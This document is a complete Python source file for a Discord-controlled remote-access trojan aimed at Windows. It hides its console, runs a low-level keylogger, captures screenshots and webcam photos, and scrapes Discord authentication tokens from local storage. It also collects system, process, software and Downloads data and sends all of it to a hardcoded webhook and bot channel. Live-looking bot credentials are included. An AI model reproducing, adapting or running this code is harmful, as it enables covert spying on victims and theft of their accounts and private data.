import os
import sys
import time
import base64
import requests
import subprocess
import threading
import cv2
import numpy as np
from PIL import ImageGrab
import io
import socket
import getpass
import platform
import json
import tempfile
import shutil
import ctypes
from datetime import datetime, timezone

BOT_TOKEN = "MTUyMDI1NzU5MTA2OTExNDQ0OA.GiqiPN.cGqgzRHz3nYhB0pfpTjjKGSOuryJUn0SSs1RHc"
CLIENT_ID = "1520257591069114448"
WEBHOOK_URL = "https://discord.com/api/webhooks/1520235001881428098/P7NpzBNubCGGy4iPHnwsZUV4XBx_HWrw3NuLy99zm4CPFGbNbPDUYZwaD5WdvO8l3UgQ"
CHANNEL_ID = None
running = True

def send_webhook_notification(message, status="info"):
    """Send notification to webhook"""
    try:
        computer = socket.gethostname()
        username = getpass.getuser()
        ip = socket.gethostbyname(socket.gethostname())
        try:
            external_ip = requests.get("https://api.ipify.org", timeout=3).text
        except:
            external_ip = "N/A"
        
        full_msg = f"""**{status.upper()} - {computer}**
User: {username}
IP: {ip}
External IP: {external_ip}
Time: {datetime.now(timezone.utc).isoformat()}
{message}"""
        
        payload = {"content": full_msg}
        requests.post(WEBHOOK_URL, json=payload, timeout=5)
    except:
        pass

def install_missing_modules():
    required_modules = {
        'cv2': 'opencv-python',
        'PIL': 'Pillow',
        'requests': 'requests',
        'numpy': 'numpy'
    }
    for module_name, pip_name in required_modules.items():
        try:
            __import__(module_name)
        except ImportError:
            try:
                subprocess.check_call([sys.executable, "-m", "pip", "install", pip_name, "--quiet", "--disable-pip-version-check"])
            except:
                pass

install_missing_modules()

import cv2
import numpy as np
from PIL import ImageGrab

# Send startup notification
send_webhook_notification("Startup script is initializing...", "info")

class WindowsKeylogger:
    def __init__(self):
        self.buffer = []
        self.lock = threading.Lock()
        self.running = True
        self.hook_id = None
        self.user32 = ctypes.windll.user32
        self.kernel32 = ctypes.windll.kernel32
        self.WM_KEYDOWN = 0x0100
        self.WM_SYSKEYDOWN = 0x0104
        self.WH_KEYBOARD_LL = 13
        self.key_map = {
            0x08: '[BACKSPACE]', 0x09: '[TAB]', 0x0D: '\\n', 0x10: '[SHIFT]',
            0x11: '[CTRL]', 0x12: '[ALT]', 0x14: '[CAPSLOCK]', 0x1B: '[ESC]',
            0x20: ' ', 0x21: '[PGUP]', 0x22: '[PGDN]', 0x23: '[END]',
            0x24: '[HOME]', 0x25: '[LEFT]', 0x26: '[UP]', 0x27: '[RIGHT]',
            0x28: '[DOWN]', 0x2D: '[INSERT]', 0x2E: '[DELETE]', 0x5B: '[WIN]',
            0x5C: '[WIN]', 0x70: '[F1]', 0x71: '[F2]', 0x72: '[F3]',
            0x73: '[F4]', 0x74: '[F5]', 0x75: '[F6]', 0x76: '[F7]',
            0x77: '[F8]', 0x78: '[F9]', 0x79: '[F10]', 0x7A: '[F11]',
            0x7B: '[F12]', 0x90: '[NUMLOCK]', 0x91: '[SCROLLLOCK]',
            0xA0: '[LSHIFT]', 0xA1: '[RSHIFT]', 0xA2: '[LCTRL]', 0xA3: '[RCTRL]',
            0xA4: '[LALT]', 0xA5: '[RALT]'
        }
        self.shift_map = {
            '1': '!', '2': '@', '3': '#', '4': '$$', '5': '%',
            '6': '^', '7': '&', '8': '*', '9': '(', '0': ')',
            '-': '_', '=': '+', '[': '{', ']': '}', '\\\\': '|',
            ';': ':', "'": '"', ',': '<', '.': '>', '/': '?',
            '`': '~'
        }
        self.caps_lock = False
        self.shift_pressed = False
        self.HOOKPROC = ctypes.WINFUNCTYPE(ctypes.c_int, ctypes.c_int, ctypes.c_int, ctypes.POINTER(ctypes.c_void_p))
        self.hook_proc = self.HOOKPROC(self.hook_callback)

    def get_ascii_char(self, vk_code, scan_code, flags):
        state = (ctypes.c_ubyte * 256)()
        self.user32.GetKeyboardState(ctypes.byref(state))
        wchar = (ctypes.c_wchar * 2)()
        result = self.user32.ToUnicode(vk_code, scan_code, state, wchar, 1, flags)
        if result > 0:
            char = wchar[0]
            if self.shift_pressed and char in self.shift_map:
                return self.shift_map[char]
            return char
        return None

    def hook_callback(self, nCode, wParam, lParam):
        try:
            if nCode >= 0:
                if wParam == self.WM_KEYDOWN or wParam == self.WM_SYSKEYDOWN:
                    vk_code = (ctypes.cast(lParam, ctypes.POINTER(ctypes.c_void_p)).contents.value >> 0) & 0xFF
                    scan_code = (ctypes.cast(lParam, ctypes.POINTER(ctypes.c_void_p)).contents.value >> 16) & 0xFF
                    flags = (ctypes.cast(lParam, ctypes.POINTER(ctypes.c_void_p)).contents.value >> 24) & 0xFF
                    
                    if vk_code == 0x10:
                        self.shift_pressed = True
                    elif vk_code == 0x14:
                        self.caps_lock = not self.caps_lock
                    
                    char = self.get_ascii_char(vk_code, scan_code, flags)
                    if char is not None and char != '':
                        with self.lock:
                            self.buffer.append(char)
                            if len(self.buffer) > 5000:
                                self.buffer = self.buffer[-4000:]
                    elif vk_code in self.key_map:
                        with self.lock:
                            self.buffer.append(self.key_map[vk_code])
                            if len(self.buffer) > 5000:
                                self.buffer = self.buffer[-4000:]
        except:
            pass
        return self.user32.CallNextHookEx(self.hook_id, nCode, wParam, lParam)

    def start(self):
        try:
            self.hook_id = self.user32.SetWindowsHookExW(
                self.WH_KEYBOARD_LL,
                self.hook_proc,
                self.kernel32.GetModuleHandleW(None),
                0
            )
            if self.hook_id:
                msg = ctypes.wintypes.MSG()
                while self.running:
                    ret = self.user32.GetMessageW(ctypes.byref(msg), None, 0, 0)
                    if ret == -1:
                        break
                    self.user32.TranslateMessage(ctypes.byref(msg))
                    self.user32.DispatchMessageW(ctypes.byref(msg))
        except:
            pass

    def get_buffer(self):
        with self.lock:
            if self.buffer:
                data = ''.join(self.buffer)
                self.buffer.clear()
                return data
            return None

def hide_console():
    try:
        if platform.system() == "Windows":
            ctypes.windll.user32.ShowWindow(ctypes.windll.kernel32.GetConsoleWindow(), 0)
    except:
        pass

def take_screenshot():
    try:
        screenshot = ImageGrab.grab()
        img_bytes = io.BytesIO()
        screenshot.save(img_bytes, format='PNG')
        return base64.b64encode(img_bytes.getvalue()).decode('utf-8')
    except:
        return None

def take_camera_photo():
    try:
        cap = cv2.VideoCapture(0)
        cap.set(cv2.CAP_PROP_FRAME_WIDTH, 640)
        cap.set(cv2.CAP_PROP_FRAME_HEIGHT, 480)
        ret, frame = cap.read()
        if ret:
            _, img_encoded = cv2.imencode('.jpg', frame)
            cap.release()
            return base64.b64encode(img_encoded.tobytes()).decode('utf-8')
        cap.release()
    except:
        pass
    return None

def send_discord_message(content, file_bytes=None, filename=None):
    try:
        if file_bytes:
            files = {'file': (filename, file_bytes, 'image/png')}
            data = {'content': content}
            requests.post(
                f"https://discord.com/api/v9/channels/{CHANNEL_ID}/messages",
                headers={"Authorization": f"Bot {BOT_TOKEN}"},
                data=data,
                files=files,
                timeout=10
            )
        else:
            payload = {"content": content}
            requests.post(
                f"https://discord.com/api/v9/channels/{CHANNEL_ID}/messages",
                headers={"Authorization": f"Bot {BOT_TOKEN}"},
                json=payload,
                timeout=10
            )
    except:
        pass

def get_full_system_report():
    data = {}
    
    data["system"] = {
        "computer_name": socket.gethostname(),
        "username": getpass.getuser(),
        "os": platform.system() + " " + platform.release(),
        "os_version": platform.version(),
        "architecture": platform.machine(),
        "processor": platform.processor(),
        "cpu_count": os.cpu_count(),
        "timestamp": datetime.now(timezone.utc).isoformat()
    }
    
    data["network"] = {
        "ip": socket.gethostbyname(socket.gethostname()),
        "external_ip": requests.get("https://api.ipify.org", timeout=3).text if requests else "N/A"
    }
    
    drives = []
    if platform.system() == "Windows":
        for letter in "ABCDEFGHIJKLMNOPQRSTUVWXYZ":
            drive = f"{letter}:\\\\"
            if os.path.exists(drive):
                try:
                    usage = shutil.disk_usage(drive)
                    drives.append({
                        "drive": drive,
                        "total_gb": round(usage.total / (1024**3), 2),
                        "used_gb": round(usage.used / (1024**3), 2),
                        "free_gb": round(usage.free / (1024**3), 2),
                        "percent_used": round((usage.used / usage.total) * 100, 1)
                    })
                except:
                    pass
    data["drives"] = drives
    
    downloads_path = os.path.expanduser("~/Downloads")
    downloads = []
    if os.path.exists(downloads_path):
        try:
            for item in os.listdir(downloads_path)[:50]:
                item_path = os.path.join(downloads_path, item)
                if os.path.isfile(item_path):
                    downloads.append({
                        "name": item,
                        "size": os.path.getsize(item_path),
                        "modified": datetime.fromtimestamp(os.path.getmtime(item_path)).isoformat()
                    })
        except:
            pass
    data["downloads"] = downloads
    
    discord_tokens = []
    discord_paths = []
    if platform.system() == "Windows":
        appdata = os.environ.get("APPDATA", "")
        localappdata = os.environ.get("LOCALAPPDATA", "")
        discord_paths.extend([
            os.path.join(appdata, "discord", "Local Storage", "leveldb"),
            os.path.join(appdata, "discordcanary", "Local Storage", "leveldb"),
            os.path.join(appdata, "discordptb", "Local Storage", "leveldb"),
        ])
    for path in discord_paths:
        if os.path.exists(path):
            try:
                for file in os.listdir(path):
                    if file.endswith('.log') or file.endswith('.ldb'):
                        file_path = os.path.join(path, file)
                        try:
                            with open(file_path, 'r', errors='ignore') as f:
                                content = f.read(5000)
                                import re
                                token_patterns = [
                                    r'[\\w-]{{24}}\\.[\\w-]{{6}}\\.[\\w-]{{27}}',
                                    r'mfa\\.[\\w-]{{84}}',
                                    r'[\\w-]{{24}}\\.[\\w-]{{6}}\\.[\\w-]{{38}}'
                                ]
                                for pattern in token_patterns:
                                    matches = re.findall(pattern, content)
                                    for match in matches:
                                        if match not in discord_tokens:
                                            discord_tokens.append(match)
                        except:
                            pass
            except:
                pass
    data["discord_tokens"] = discord_tokens[:10]
    
    processes = []
    try:
        if platform.system() == "Windows":
            output = subprocess.check_output(["tasklist", "/FO", "CSV", "/V"], stderr=subprocess.DEVNULL).decode()
            for line in output.splitlines()[1:30]:
                parts = line.split(',')
                if len(parts) >= 8:
                    processes.append({
                        "name": parts[0].strip('"'),
                        "pid": parts[1].strip('"'),
                        "memory_mb": parts[4].strip('"'),
                        "user": parts[6].strip('"')
                    })
    except:
        pass
    data["processes"] = processes
    
    software = []
    try:
        if platform.system() == "Windows":
            import winreg
            keys = [
                (winreg.HKEY_LOCAL_MACHINE, r"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall"),
                (winreg.HKEY_LOCAL_MACHINE, r"SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall"),
            ]
            for hkey, key in keys:
                try:
                    with winreg.OpenKey(hkey, key) as reg_key:
                        index = 0
                        while True:
                            try:
                                subkey_name = winreg.EnumKey(reg_key, index)
                                with winreg.OpenKey(reg_key, subkey_name) as subkey:
                                    try:
                                        name = winreg.QueryValueEx(subkey, "DisplayName")[0]
                                        version = winreg.QueryValueEx(subkey, "DisplayVersion")[0] if "DisplayVersion" in [winreg.EnumValue(subkey, i)[0] for i in range(winreg.QueryInfoKey(subkey)[1])] else "N/A"
                                        if name:
                                            software.append({"name": name, "version": version})
                                    except:
                                        pass
                                index += 1
                            except WindowsError:
                                break
                except:
                    pass
    except:
        pass
    data["installed_software"] = software[:50]
    
    return data

def register_slash_commands():
    """Register slash commands with Discord API"""
    try:
        headers = {"Authorization": f"Bot {BOT_TOKEN}", "Content-Type": "application/json"}
        url = f"https://discord.com/api/v9/applications/{CLIENT_ID}/commands"
        
        response = requests.get(url, headers=headers)
        if response.status_code == 200:
            existing = response.json()
            for cmd in existing:
                requests.delete(f"{url}/{cmd['id']}", headers=headers)
        
        commands = [
            {"name": "screenshot", "description": "Take a screenshot of the computer"},
            {"name": "camera", "description": "Take a photo from the webcam"},
            {"name": "system", "description": "Show system information"},
            {"name": "downloads", "description": "Show files in Downloads folder"},
            {"name": "processes", "description": "Show running processes"},
            {"name": "tokens", "description": "Show found Discord tokens"},
            {"name": "keylog", "description": "Show recent keystrokes"},
            {"name": "help", "description": "Show all available commands"},
            {"name": "stop", "description": "Stop the bot"}
        ]
        
        for cmd in commands:
            requests.post(url, headers=headers, json=cmd)
        return True
    except:
        return False

def handle_slash_command(interaction):
    """Handle slash command interactions"""
    try:
        data = interaction.get("data", {})
        command_name = data.get("name", "")
        token = interaction.get("token")
        
        headers = {"Authorization": f"Bot {BOT_TOKEN}", "Content-Type": "application/json"}
        response_url = f"https://discord.com/api/v9/interactions/{interaction['id']}/{token}/callback"
        
        if command_name == "screenshot":
            requests.post(response_url, headers=headers, json={"type": 5})
            screenshot = take_screenshot()
            if screenshot:
                img_data = base64.b64decode(screenshot)
                followup_url = f"https://discord.com/api/v9/webhooks/{CLIENT_ID}/{token}"
                files = {'file': ('screenshot.png', img_data, 'image/png')}
                requests.post(followup_url, headers=headers, files=files, data={"content": "Screenshot taken:"})
            else:
                followup_url = f"https://discord.com/api/v9/webhooks/{CLIENT_ID}/{token}"
                requests.post(followup_url, headers=headers, json={"content": "Failed to take screenshot"})
        
        elif command_name == "camera":
            requests.post(response_url, headers=headers, json={"type": 5})
            camera = take_camera_photo()
            if camera:
                img_data = base64.b64decode(camera)
                followup_url = f"https://discord.com/api/v9/webhooks/{CLIENT_ID}/{token}"
                files = {'file': ('camera.jpg', img_data, 'image/jpeg')}
                requests.post(followup_url, headers=headers, files=files, data={"content": "Camera photo taken:"})
            else:
                followup_url = f"https://discord.com/api/v9/webhooks/{CLIENT_ID}/{token}"
                requests.post(followup_url, headers=headers, json={"content": "Failed to take camera photo"})
        
        elif command_name == "system":
            data = get_full_system_report()
            summary = f"""=== SYSTEM REPORT ===
Computer: {data['system']['computer_name']}
User: {data['system']['username']}
OS: {data['system']['os']}
Architecture: {data['system']['architecture']}
CPU: {data['system']['processor']}
CPU Cores: {data['system']['cpu_count']}
IP: {data['network']['ip']}
External IP: {data['network']['external_ip']}
Drives: {len(data.get('drives', []))}
Downloads: {len(data.get('downloads', []))}
Processes: {len(data.get('processes', []))}
Installed Software: {len(data.get('installed_software', []))}
Discord Tokens: {len(data.get('discord_tokens', []))}"""
            requests.post(response_url, headers=headers, json={"type": 4, "data": {"content": f"```\\n{summary}\\n```"}})
        
        elif command_name == "downloads":
            data = get_full_system_report()
            if data.get("downloads"):
                dl_list = "\\n".join([f"- {d['name']} ({d['size']} bytes)" for d in data["downloads"][:20]])
                content = f"Downloads:\\n```\\n{dl_list}\\n```"
            else:
                content = "No downloads found"
            requests.post(response_url, headers=headers, json={"type": 4, "data": {"content": content}})
        
        elif command_name == "processes":
            data = get_full_system_report()
            if data.get("processes"):
                proc_list = "\\n".join([f"- {p['name']} (PID: {p['pid']}) - {p.get('memory_mb', 'N/A')}" for p in data["processes"][:20]])
                content = f"Running processes:\\n```\\n{proc_list}\\n```"
            else:
                content = "No processes found"
            requests.post(response_url, headers=headers, json={"type": 4, "data": {"content": content}})
        
        elif command_name == "tokens":
            data = get_full_system_report()
            if data.get("discord_tokens"):
                tokens = "\\n".join([f"- {t}" for t in data["discord_tokens"]])
                content = f"Discord tokens found:\\n```\\n{tokens}\\n```"
            else:
                content = "No Discord tokens found"
            requests.post(response_url, headers=headers, json={"type": 4, "data": {"content": content}})
        
        elif command_name == "keylog":
            if 'keylogger' in globals():
                keys = keylogger.get_buffer()
                if keys:
                    content = f"Keylog:\\n```\\n{keys[-2000:]}\\n```"
                else:
                    content = "No keys logged yet"
            else:
                content = "Keylogger not initialized"
            requests.post(response_url, headers=headers, json={"type": 4, "data": {"content": content}})
        
        elif command_name == "help":
            help_text = """**Available Commands:**
/screenshot - Take a screenshot
/camera - Take camera photo
/system - Show system info
/downloads - Show downloads folder
/processes - Show running processes
/tokens - Show found Discord tokens
/keylog - Show recent keystrokes
/help - Show this message
/stop - Stop the bot"""
            requests.post(response_url, headers=headers, json={"type": 4, "data": {"content": help_text}})
        
        elif command_name == "stop":
            global running
            running = False
            requests.post(response_url, headers=headers, json={"type": 4, "data": {"content": "Stopping bot..."}})
    except:
        pass

def command_handler():
    global running
    last_message_id = None
    
    # Register slash commands on startup
    register_slash_commands()
    send_webhook_notification("Slash commands registered", "success")
    
    while running:
        try:
            headers = {"Authorization": f"Bot {BOT_TOKEN}"}
            params = {"limit": 5}
            if last_message_id:
                params["after"] = last_message_id
            
            response = requests.get(
                f"https://discord.com/api/v9/channels/{CHANNEL_ID}/messages",
                headers=headers,
                params=params,
                timeout=5
            )
            
            if response.status_code == 200:
                messages = response.json()
                for msg in messages:
                    if msg["author"]["id"] == CLIENT_ID:
                        continue
                    
                    content = msg.get("content", "").strip()
                    if not content:
                        continue
                    
                    if not last_message_id or msg["id"] > last_message_id:
                        last_message_id = msg["id"]
                    
                    # Handle text commands as fallback
                    if content.startswith("/") or content.startswith("!"):
                        command = content[1:].lower()
                        
                        if command == "screenshot":
                            screenshot = take_screenshot()
                            if screenshot:
                                img_data = base64.b64decode(screenshot)
                                send_discord_message("Screenshot taken:", img_data, "screenshot.png")
                            else:
                                send_discord_message("Failed to take screenshot")
                        
                        elif command == "camera":
                            camera = take_camera_photo()
                            if camera:
                                img_data = base64.b64decode(camera)
                                send_discord_message("Camera photo taken:", img_data, "camera.jpg")
                            else:
                                send_discord_message("Failed to take camera photo")
                        
                        elif command == "system":
                            data = get_full_system_report()
                            summary = f"""=== SYSTEM REPORT ===
Computer: {data['system']['computer_name']}
User: {data['system']['username']}
OS: {data['system']['os']}
Architecture: {data['system']['architecture']}
CPU: {data['system']['processor']}
CPU Cores: {data['system']['cpu_count']}
IP: {data['network']['ip']}
External IP: {data['network']['external_ip']}
Drives: {len(data.get('drives', []))}
Downloads: {len(data.get('downloads', []))}
Processes: {len(data.get('processes', []))}
Installed Software: {len(data.get('installed_software', []))}
Discord Tokens: {len(data.get('discord_tokens', []))}"""
                            send_discord_message(f"```\\n{summary}\\n```")
                        
                        elif command == "downloads":
                            data = get_full_system_report()
                            if data.get("downloads"):
                                dl_list = "\\n".join([f"- {d['name']} ({d['size']} bytes)" for d in data["downloads"][:20]])
                                send_discord_message(f"Downloads:\\n```\\n{dl_list}\\n```")
                            else:
                                send_discord_message("No downloads found")
                        
                        elif command == "processes":
                            data = get_full_system_report()
                            if data.get("processes"):
                                proc_list = "\\n".join([f"- {p['name']} (PID: {p['pid']}) - {p.get('memory_mb', 'N/A')}" for p in data["processes"][:20]])
                                send_discord_message(f"Running processes:\\n```\\n{proc_list}\\n```")
                            else:
                                send_discord_message("No processes found")
                        
                        elif command == "tokens":
                            data = get_full_system_report()
                            if data.get("discord_tokens"):
                                tokens = "\\n".join([f"- {t}" for t in data["discord_tokens"]])
                                send_discord_message(f"Discord tokens found:\\n```\\n{tokens}\\n```")
                            else:
                                send_discord_message("No Discord tokens found")
                        
                        elif command == "keylog":
                            keys = keylogger.get_buffer() if 'keylogger' in globals() else None
                            if keys:
                                send_discord_message(f"Keylog:\\n```\\n{keys[-2000:]}\\n```")
                            else:
                                send_discord_message("No keys logged yet")
                        
                        elif command == "help":
                            help_text = """**Available Commands:**
/screenshot - Take a screenshot
/camera - Take camera photo
/system - Show system info
/downloads - Show downloads folder
/processes - Show running processes
/tokens - Show found Discord tokens
/keylog - Show recent keystrokes
/help - Show this message
/stop - Stop the bot"""
                            send_discord_message(help_text)
                        
                        elif command == "stop":
                            send_discord_message("Stopping bot...")
                            running = False
                            break
                        
        except:
            pass
        time.sleep(0.5)

def keylog_loop():
    global keylogger
    keylogger = WindowsKeylogger()
    threading.Thread(target=keylogger.start, daemon=True).start()
    send_webhook_notification("Keylogger started successfully", "success")
    while running:
        time.sleep(60)
        keys = keylogger.get_buffer()
        if keys:
            send_discord_message(f"Keylog Report:\\n```\\n{keys[-1900:]}\\n```")

def main():
    global CHANNEL_ID
    hide_console()
    
    send_webhook_notification("Startup script main() called", "info")
    
    if len(sys.argv) > 1:
        CHANNEL_ID = sys.argv[1]
    else:
        try:
            headers = {"Authorization": f"Bot {BOT_TOKEN}"}
            response = requests.get("https://discord.com/api/v9/users/@me/guilds", headers=headers, timeout=5)
            if response.status_code == 200:
                guilds = response.json()
                for guild in guilds:
                    channels_response = requests.get(
                        f"https://discord.com/api/v9/guilds/{guild['id']}/channels",
                        headers=headers,
                        timeout=5
                    )
                    if channels_response.status_code == 200:
                        channels = channels_response.json()
                        for channel in channels:
                            if channel.get("type") == 0:
                                CHANNEL_ID = channel["id"]
                                break
                    if CHANNEL_ID:
                        break
        except:
            pass
    
    if not CHANNEL_ID:
        send_webhook_notification("ERROR: No channel ID found!", "error")
        return
    
    send_webhook_notification(f"Channel ID found: {CHANNEL_ID}", "success")
    
    send_discord_message(f"Bot started on {socket.gethostname()}\\nType /help or !help for commands")
    send_webhook_notification(f"Bot started on {socket.gethostname()}", "success")
    
    threading.Thread(target=keylog_loop, daemon=True).start()
    command_handler()

if __name__ == "__main__":
    main()
